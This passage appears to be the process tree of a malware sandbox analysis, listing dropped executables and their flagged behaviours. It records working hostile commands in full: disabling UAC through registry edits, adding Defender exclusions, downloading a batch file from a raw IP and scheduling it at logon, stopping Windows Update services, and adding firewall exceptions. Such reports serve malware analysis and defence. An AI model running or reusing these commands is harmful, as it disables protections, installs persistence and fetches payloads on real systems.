- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3592
-
-
C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"C:\Users\Admin\AppData\Local\Temp\Files\kiyan.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies system certificate store
PID:236
-
-
C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1656 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZQBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAZwBxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHQAcAB5ACMAPgA="4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096
-
-
C:\Windows\Client.exe"C:\Windows\Client.exe"4⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3996 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"' & exit5⤵PID:4604
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\WIndows\svchost.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:1884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6AA2.tmp.bat""5⤵PID:4124
-
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:4968
-
-
C:\WIndows\svchost.exe"C:\WIndows\svchost.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"C:\Users\Admin\AppData\Local\Temp\Files\winbox.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client_protected.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:4760 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4760 -s 13764⤵
- Program crash
PID:2568
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\x.exe"C:\Users\Admin\AppData\Local\Temp\Files\x.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"C:\Users\Admin\AppData\Local\Temp\Files\twztl.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1144
-
-
C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:2532 -
C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"C:\Users\Admin\AppData\Local\Temp\Files\cluton.exe"4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2412
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1872 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E953.tmp\E954.tmp\E955.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"4⤵PID:3420
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)5⤵
- Access Token Manipulation: Create Process with Token
PID:3612 -
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2160 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EC22.tmp\EC23.tmp\EC24.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"7⤵PID:1044
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:1060
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:716
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F8⤵
- UAC bypass
PID:1164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"8⤵PID:3200
-
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command9⤵PID:5004
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/8⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1868 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff0f903cb8,0x7fff0f903cc8,0x7fff0f903cd89⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1920 /prefetch:29⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:39⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2544 /prefetch:89⤵PID:3132
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3228 /prefetch:19⤵PID:1596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:19⤵PID:2864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:19⤵PID:1616
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3848 /prefetch:89⤵PID:1144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5844 /prefetch:89⤵PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:19⤵PID:1920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4964 /prefetch:89⤵PID:5404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4792 /prefetch:19⤵PID:6212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:19⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1844,6967958768544053884,2485478293441520761,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5940 /prefetch:29⤵PID:5648
-
-
-
C:\Windows\system32\attrib.exeattrib +s +h d:\net8⤵
- Sets file to hidden
- Views/modifies file attributes
PID:3048
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -c "invoke-webrequest -uri http://206.217.142.166:1234/windows/v2/dr.bat -outfile d:\net\dr\dr.bat"8⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2392
-
-
C:\Windows\system32\schtasks.exeSchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f8⤵
- Scheduled Task/Job: Scheduled Task
PID:988
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:440
-
-
C:\Users\Admin\AppData\Local\Temp\Files\s.exe"C:\Users\Admin\AppData\Local\Temp\Files\s.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4552
-
-
C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe"C:\Users\Admin\AppData\Local\Temp\Files\CompleteStudio.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1556 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5580
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:3112 -
C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"C:\Users\Admin\AppData\Local\Temp\Files\Cbmefxrmnv.exe"4⤵
- Executes dropped EXE
PID:6584
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\zts.exe"C:\Users\Admin\AppData\Local\Temp\Files\zts.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5612 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5612 -s 4484⤵
- Program crash
PID:6128
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe"C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:6172 -
C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exeC:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe4⤵
- Executes dropped EXE
PID:6356
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exeC:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe4⤵
- Executes dropped EXE
PID:6440 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 925⤵
- Program crash
PID:6296
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exeC:\Users\Admin\AppData\Local\Temp\Files\gvndxfghs.exe4⤵
- Executes dropped EXE
PID:6200
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ktyhpldea.exe"C:\Users\Admin\AppData\Local\Temp\Files\ktyhpldea.exe"3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6364
-
-
C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6468
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ZinTask.exe"C:\Users\Admin\AppData\Local\Temp\Files\ZinTask.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6544 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6544 -s 2444⤵
- Program crash
PID:6636
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"C:\Users\Admin\AppData\Local\Temp\Files\KB824105-x86-ENU.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6756 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c net use4⤵
- System Location Discovery: System Language Discovery
PID:6952 -
C:\Windows\SysWOW64\net.exenet use5⤵
- System Location Discovery: System Language Discovery
PID:7020
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe"C:\Users\Admin\AppData\Local\Temp\Files\NoEscape.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6896
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"C:\Users\Admin\AppData\Local\Temp\Files\Nework.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5244
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test10-29.exe"C:\Users\Admin\AppData\Local\Temp\Files\test10-29.exe"3⤵
- Executes dropped EXE
PID:7136
-
-
C:\Users\Admin\AppData\Local\Temp\Files\m.exe"C:\Users\Admin\AppData\Local\Temp\Files\m.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6068
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Papercut.Smtp.Setup.exe"C:\Users\Admin\AppData\Local\Temp\Files\Papercut.Smtp.Setup.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5092 -
C:\Windows\Temp\{F164CC5E-0CDC-475C-B700-3B73B8D04018}\.cr\Papercut.Smtp.Setup.exe"C:\Windows\Temp\{F164CC5E-0CDC-475C-B700-3B73B8D04018}\.cr\Papercut.Smtp.Setup.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\Files\Papercut.Smtp.Setup.exe" -burn.filehandle.attached=556 -burn.filehandle.self=5644⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5580 -
C:\Windows\Temp\{52EC1D7F-59E6-4431-AE19-0FC6F1EDDBC0}\.be\Papercut.Smtp.Setup.exe"C:\Windows\Temp\{52EC1D7F-59E6-4431-AE19-0FC6F1EDDBC0}\.be\Papercut.Smtp.Setup.exe" -q -burn.elevated BurnPipe.{66EBAF4E-4B36-4B26-929B-F334A9C985C9} {B20DA5C3-95C6-4352-B644-51871DFE308E} 55805⤵PID:6792
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe"C:\Users\Admin\AppData\Local\Temp\Files\Guide2018.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4104 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122884⤵PID:2524
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\T3.exe"C:\Users\Admin\AppData\Local\Temp\Files\T3.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -Seconds 5; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\Files\T3.exe' -Force4⤵PID:6676
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5760
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\random.exe"C:\Users\Admin\AppData\Local\Temp\Files\random.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:5440
-
-
C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"C:\Users\Admin\AppData\Local\Temp\Files\tstory.exe"3⤵
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:4520
-
-
C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"3⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:5816 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:2116
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:1780
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:6008
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:3224
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:6088
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:6800
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:6780
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:7072
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
PID:5516
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:6176
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:6380
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵PID:6120
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\test20.exe"C:\Users\Admin\AppData\Local\Temp\Files\test20.exe"3⤵PID:7148
-
-
C:\Users\Admin\AppData\Local\Temp\Files\run2.exe"C:\Users\Admin\AppData\Local\Temp\Files\run2.exe"3⤵PID:6164
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6649.tmp\664A.tmp\664B.bat C:\Users\Admin\AppData\Local\Temp\Files\run2.exe"4⤵PID:6260
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:6068
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6260 -s 3125⤵PID:6752
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\dsd.exe"C:\Users\Admin\AppData\Local\Temp\Files\dsd.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5376 -
C:\Users\Admin\AppData\Roaming\svchost.exe"C:\Users\Admin\AppData\Roaming\svchost.exe"4⤵
- System Location Discovery: System Language Discovery
PID:1060 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\svchost.exe" "svchost.exe" ENABLE5⤵
- Modifies Windows Firewall
PID:6288
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"C:\Users\Admin\AppData\Local\Temp\Files\InstallSetup.exe"3⤵
- System Location Discovery: System Language Discovery
PID:5524 -
C:\Users\Admin\AppData\Local\Temp\8A9A.tmp.exe"C:\Users\Admin\AppData\Local\Temp\8A9A.tmp.exe"4⤵PID:3536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3536 -s 13445⤵
- Program crash
PID:6412
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\js.exe"C:\Users\Admin\AppData\Local\Temp\Files\js.exe"3⤵PID:6472
-
-
C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"C:\Users\Admin\AppData\Local\Temp\Files\msf.exe"3⤵PID:6372
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6372 -s 12284⤵
- Program crash
PID:6420
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Indentif.exe"C:\Users\Admin\AppData\Local\Temp\Files\Indentif.exe"3⤵PID:6728
-
-
C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"3⤵PID:1556
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c start "" "C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"4⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"C:\Users\Admin\AppData\Local\Temp\Files\curlapp64.exe"5⤵PID:6128
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\Admin\AppData\Local\Temp\Files\feb9sxwk.exe"4⤵PID:4700
-
C:\Windows\system32\timeout.exetimeout /t 10 /nobreak5⤵
- Delays execution with timeout.exe
PID:3252
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Final.exe"C:\Users\Admin\AppData\Local\Temp\Files\Final.exe"3⤵PID:5704
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"4⤵PID:1080
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"5⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:540 -
C:\Windows\system32\chcp.comchcp 650016⤵PID:5520
-
-
C:\Windows\system32\netsh.exenetsh wlan show profiles6⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:7064
-
-
C:\Windows\system32\findstr.exefindstr /R /C:"[ ]:[ ]"6⤵PID:1812
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"5⤵PID:2556
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:6200
-
-
C:\Windows\system32\netsh.exenetsh wlan show networks mode=bssid6⤵PID:6452
-
-
C:\Windows\system32\findstr.exefindstr "SSID BSSID Signal"6⤵PID:912
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient_protected.exe"3⤵PID:6328
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"2⤵PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
